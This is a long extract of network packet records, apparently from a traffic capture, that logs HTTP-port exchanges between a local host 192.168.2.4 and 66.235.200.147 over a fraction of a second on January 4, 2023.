Jan 4, 2023 16:47:38.561465979 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.561480045 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.561494112 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.561522007 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.561523914 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.561552048 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.561556101 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.561578989 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.561588049 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.561609983 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.561620951 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.561634064 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.561654091 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.561702013 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.561734915 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.561769962 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.561778069 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.561800957 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.561825991 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.561836958 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.561850071 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.561861038 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.561903000 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.561907053 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.561929941 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.561935902 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.561969995 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.561973095 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.562006950 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.562020063 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.562047958 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.562051058 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.562083960 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.562099934 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.562124014 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.562129021 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.562144041 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.562165976 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.562197924 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.562227011 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.562242985 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.562242985 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.562259912 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.562282085 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.562290907 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.562305927 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.562323093 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.562325001 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.562355995 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.562356949 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.562377930 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.562398911 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.562428951 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.562448978 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.562479019 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.562513113 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.562542915 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.562551022 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.562551022 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.562551022 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.562576056 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.562583923 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.562597990 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.562618971 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.562649965 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.562680006 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.562722921 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.562722921 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.562846899 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.562943935 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.563020945 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.563069105 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.563101053 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.563141108 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.563174009 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.563194990 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.563201904 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.563229084 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.563241005 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.563271999 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.563288927 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.563288927 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.563313007 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.563327074 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.563347101 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.563374996 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.563378096 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.563410044 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.563427925 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.563441992 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.563453913 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.563472986 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.563481092 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.563503027 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.563504934 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.563530922 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.563539028 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.563553095 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.563571930 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.563604116 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.563608885 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.563644886 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.563668013 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.564194918 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.564229965 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.564260006 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.564271927 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.564305067 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.564312935 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.564342022 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.564372063 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.564373970 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.564397097 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.564412117 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.564424038 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.564460993 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.564480066 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.564493895 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.564528942 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.564528942 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.564555883 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.564573050 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.564604998 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.564604998 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.564627886 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.564636946 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.564656973 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.564670086 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.564701080 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.564706087 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.564730883 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.564744949 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.564764977 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.564769983 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.564794064 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.564814091 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.565001011 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.565042019 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.565073967 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.565098047 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.565126896 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.565129995 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.565162897 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.565184116 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.565184116 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.565197945 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.565221071 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.565232038 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.565263987 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.565277100 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.565294027 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.565319061 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.565325975 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.565340996 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.565361023 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.565372944 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.565397024 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.565397978 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.565424919 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.565428972 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.565462112 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.565470934 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.565493107 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.565496922 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.565526009 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.565541983 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.565577030 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.565602064 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.579782963 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.579818964 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.579844952 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.579870939 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.579895973 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.579898119 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.579922915 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.579952955 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.579965115 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.579965115 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.579965115 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.579979897 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.580001116 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.580008030 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.580020905 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.580039024 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.580049992 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.580065966 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.580082893 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.580092907 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.580120087 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.580125093 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.580148935 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.580156088 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.580178976 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.580184937 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.580198050 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.580223083 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.580235958 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.580251932 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.580270052 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.580279112 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.580290079 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.580307961 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.580323935 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.580333948 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.580358028 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.580360889 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.580380917 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.580389977 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.580404043 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.580434084 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.580769062 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.580816031 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.580830097 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.580842972 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.580868959 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.580871105 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.580892086 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.580899954 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.580912113 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.580928087 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.580943108 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.580955982 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.580974102 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.580986023 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.580998898 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.581017971 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.581038952 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.581068993 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.581264019 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.581301928 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.581321001 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.581336021 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.581345081 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.581371069 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.581386089 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.581415892 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.581419945 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.581454039 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.581460953 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.581491947 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.581500053 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.581527948 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.581563950 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.581569910 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.581602097 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.581615925 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.581615925 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.581640959 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.581655025 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.581682920 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.581692934 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.581722021 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.581739902 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.581758976 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.581768990 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.581796885 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.581814051 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.581835985 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.581850052 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.581876040 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.581890106 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.581924915 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.582216024 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.582245111 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.582272053 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.582278967 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.582298994 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.582300901 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.582319975 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.582329035 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.582355976 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.582365036 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.582382917 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.582390070 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.582411051 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.582417011 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.582428932 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.582437992 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.582458973 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.582465887 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.582479954 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.582494020 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.582514048 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.582520962 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.582540035 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.582549095 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.582562923 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.582576990 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.582597971 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.582602978 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.582623959 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.582632065 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.582642078 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.582659960 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.582676888 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.582710028 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.583190918 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.583220959 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.583246946 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.583259106 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.583273888 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.583281994 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.583295107 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.583303928 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.583322048 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.583332062 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.583348989 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.583359957 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.583379030 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.583388090 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.583405018 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.583415031 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.583432913 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.583441973 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.583463907 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.583467960 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.583489895 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.583497047 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.583517075 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.583525896 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.583547115 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.583554029 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.583568096 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.583581924 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.583599091 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.583610058 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.583627939 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.583636045 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.583657980 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.583679914 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.584170103 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.584198952 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.584223986 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.584244013 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.584250927 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.584270000 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.584270000 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.584280014 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.584306955 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.584306955 CET	80	49696	66.235.200.147	192.168.2.4
